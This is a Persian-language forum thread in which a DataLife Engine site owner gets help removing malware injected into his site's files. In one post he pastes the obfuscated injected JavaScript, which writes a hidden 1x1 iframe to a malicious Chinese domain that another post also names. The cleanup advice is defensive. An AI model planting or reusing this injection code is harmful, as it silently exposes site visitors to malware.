Jump to content

  •         

Photo

کمک واجب از همه،ویروسی شدن سایت


#1 larzesh

larzesh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/23 ساعت 23:36

سلام به همه دوستان عزیزی که دارن این تاپیک رو میخونن
نمیدونم چه جوری سایتم ویروسی شده ،
احتمالا خودم سیستمم ویروسی بوده ، حالا به سایت خودم هم انتقال داده شده

ببینید وارد سایت که میشین با این پیام از طرف آنتی ویروس مواجه میشید

برای دیدن عکس کلیک کنید

این موضوع از طرف یکی از بازدید کننده های سایت من هم بهم اطلاع داده شده
خواهش میکنم راهنماییم کنید تا بدونم چی کار کنم
چون اگه گوگل بفهمه که این مشکل رو داره سایتم ، بلوک میکنه منو
لطفا کمکم کنید دوستان

  • 0

#2 omrdabakhte

omrdabakhte

    پروفشنال

  • عضو سایت
  • PipPipPipPip
  • 508 posts

1388/08/23 ساعت 23:43

من که وارد سایتت شدم آنتی ویروسم هیچ اروری نداد.
نود ورژن 4 + آپدیت رو عرض می کنم.

اما خوب cpanel و خود دیتالایف انجین انتی ویروس داره.یه اسکن بکن ببین چی میشه.
اینو گفتم تا مطمئن باشی سایت خودت هیچ ویروسی نداره.
مشکل سایت زیر هست.gksdh.cn .
ببین انتی ویروس پیغام واسه ادرس شما نداد.واسه ادرس زیر داد.
توجه : وارد ادرس زیر نشید...ویروسیه!!!
http://gksdh.cn/forum/images/index.php

من که وارد آدرس بالا شدم این پیغام اومد.
 title=


اگه شما تو ساست خودت لینکی به این سایت و یا ارتباطی باهاش داری بهتره ارتباط قطع بشه.
  • 0

#3 ali.master

ali.master

    کاربر فعال انجمن

  • عضو سایت
  • PipPipPip
  • 242 posts

1388/08/23 ساعت 23:50

گمانم تو سایتت به خاطر بالا بودن پرمیشن ها شل شده
  • 0

#4 larzesh

larzesh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/23 ساعت 23:56

والا منم همین و میگم ، این آدرس رو ویروسی اعلام میکنه ، در صورتی که من هیچ عکسی یا فایلی مرتبط با این سایت که آنتی ویروس گیر میده ندارم آخههههههههه narahat

اما تو Source صفحه این اسکریپت ویروس رو پیدا کردم

اما نمیدونم کجا باید دنبال حذف اون بگردم ، یعنی این اسکریپت کجا نشسته ؟

<script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6b%73%64%68%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6d%61%67%65%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6b%73%64%68%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6d%61%67%65%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>

من اسکریپت این ویروس رو پیدا کردم ، دقیقا تو Source سایت
آخرین خط میشینه
بعد از بسته شدن تگ های
<!-- DataLife Engine Plus Copyright © 2006-2010 DatalifeEngine.iR -->

این ویروس کد خودشو لود میکنه

مشکل من اینه که نمیدونم کدوم فایل هست که برم ویرایش کنم اون فایل رو
به نظر شما کدوم فایل میتونه باشه
Main.tpl
shortstory
رو دیدم ولی تو اینا نبود !!!!
  • 0

#5 omrdabakhte

omrdabakhte

    پروفشنال

  • عضو سایت
  • PipPipPipPip
  • 508 posts

1388/08/24 ساعت 00:16

خول اگه بودنی باشه تو فایل main.tp هست.یه نگاه بنداز.
اگه نوبد به index.php یه نگاه بنداز.
  • 0

#6 larzesh

larzesh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/24 ساعت 00:22

آقا دمت گرم ، خدا پدرتو بیامرزه

مردیکه عوضی خودشو دو ایندکس جا زده بود
اما من یه چیز و نفهمیدم ، اینکه من اصلا الان یک ماهی هست که تو ایندکس نرفتم
و کاری هم نکردم
حتی این فایل رو باز نکردم تاحالا
چه جوری خودشو انداخته بود تو ایندکس آخه !!!

من ممنونم از همه شماهایی که اینجا جواب منو دادین
به امید خدا ، امید وارم بتونم روزی براتون جای دیگه جبران کنم

ممنون و متشکر

  • 0

#7 ali.master

ali.master

    کاربر فعال انجمن

  • عضو سایت
  • PipPipPip
  • 242 posts

1388/08/24 ساعت 00:47

دوباره فردا این کد میاد تو ایندکش سایتت
اگه می خوای نیاد پرمیشن ایندکس رو 444 بزار flower
  • 0

#8 payam.sepordeh

payam.sepordeh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/24 ساعت 02:52

پی سی لوکال هم با این مشکل روبه رو شده بود که من اینجوری حلش کردم:
یک بک آپ کامل از سایتم گرفتم و بعد دانلود کردم و بعد با آنتی ویروس مکافی اسکن کردم کلا کشت و دوباره ریستور کردم . اگر حجم دیتابیستون زیاده این کا رو هم می تونید کنید
اگر از سی پنل بروز استفاده میکنید از ویروس اکسن استفاده کنید 100% میکشه چون امتحان کردم.
flower
  • 0

#9 larzesh

larzesh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/24 ساعت 10:06

وایییییییییییییییییییییییی
عجب مصیبتی شده narahat narahat

آقایون عزیز ، فایل های
forum.php
admin.php
هم به این ویروس آلوده شدن
index رو تونستم پاک کنم چون سورس این ویروس اونجا بود ، و delete کردم کدهای مخربش رو
اما توی این فایل های
admin و forum
هر چی میگردم کدی نیست از این ویروس

میشه بگین
admin.php که میخواد بالا بیاد چه فایل های دیگه ای رو فراخوانی میکنه ؟
احتمالا توی اون فایل ها نشسته و با admin بالا میاد

ممنون میشم
narahat
  • 0

#10 ali.master

ali.master

    کاربر فعال انجمن

  • عضو سایت
  • PipPipPip
  • 242 posts

1388/08/24 ساعت 11:32

\engine\skins\default.skin.php
رو دوباره آپلود کن توش ویروسه

بعد توی هاستت هرچی index.html داری پاک کن
دقت کن گفتم index.html
index.php رو پاک نکنی جاش
  • 0

#11 larzesh

larzesh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/25 ساعت 07:35

سلام دوباره narahat
دوستای عزیز ،
engine\skins\default.skin.php
رفتم ، ویروس تو این نبود
اما ویروس داخل پوشه فروم رو که Forum.php رو هم آلوده کرده بود پاک کردم ، الان فروم هم درست شده
فقط admin.php
مشکل داره

شما نمیدونید admin که داره بالا میاد چه فایل هایی رو فراخوانی میکنه ؟
Default .skin.php ویروسی نبود .

کل سایت درست شده جز بخش مدیریت
یعنی تو چه فایلی نشسته ؟
راستی کل Index.html هارو هم پاک کردم
تو همه نشسته بود !
الان فقط میریت مونده narahat
  • 0

#12 ali.master

ali.master

    کاربر فعال انجمن

  • عضو سایت
  • PipPipPip
  • 242 posts

1388/08/25 ساعت 09:02

تو فایلی که گفتم هسات بعد از <body>
هر چی نباشه ما با این ویروس بزرگ شدیم donoghted
  • 0

#13 larzesh

larzesh

    عضو سایت

  • عضو سایت
  • PipPip
  • 109 posts

1388/08/25 ساعت 11:01

من واقعا خوش حالم که شما جواب من رو میدین

این فایل defult skin

http://dl.sabacd.com/uploads/default.skin.zip

لطفا دانلود کنید ، شاید توش با یه کدی که من نمیشناسم خودشو لود میکنه
ولی من هر چی گشتم پیدا نشد narahat

اگه ممکنه ممنون میشم شما هم یه نگاه بندازید boos
  • 0

#14 esaman

esaman

    کاربر فعال انجمن

  • عضو سایت
  • PipPipPip
  • 217 posts

1388/08/30 ساعت 12:40

عزیزم شما حتما از برنامه هایی مانند cute ftp و امثال اینا کار می کنید
و این برنامه با داشتن یوزر و پس هاست این کار رو می کنه
لطفا یوزر و پس هاست رو در هیچ کجا ذخیره نکنید
  • 0


0 members, 2 guests, 0 anonymous users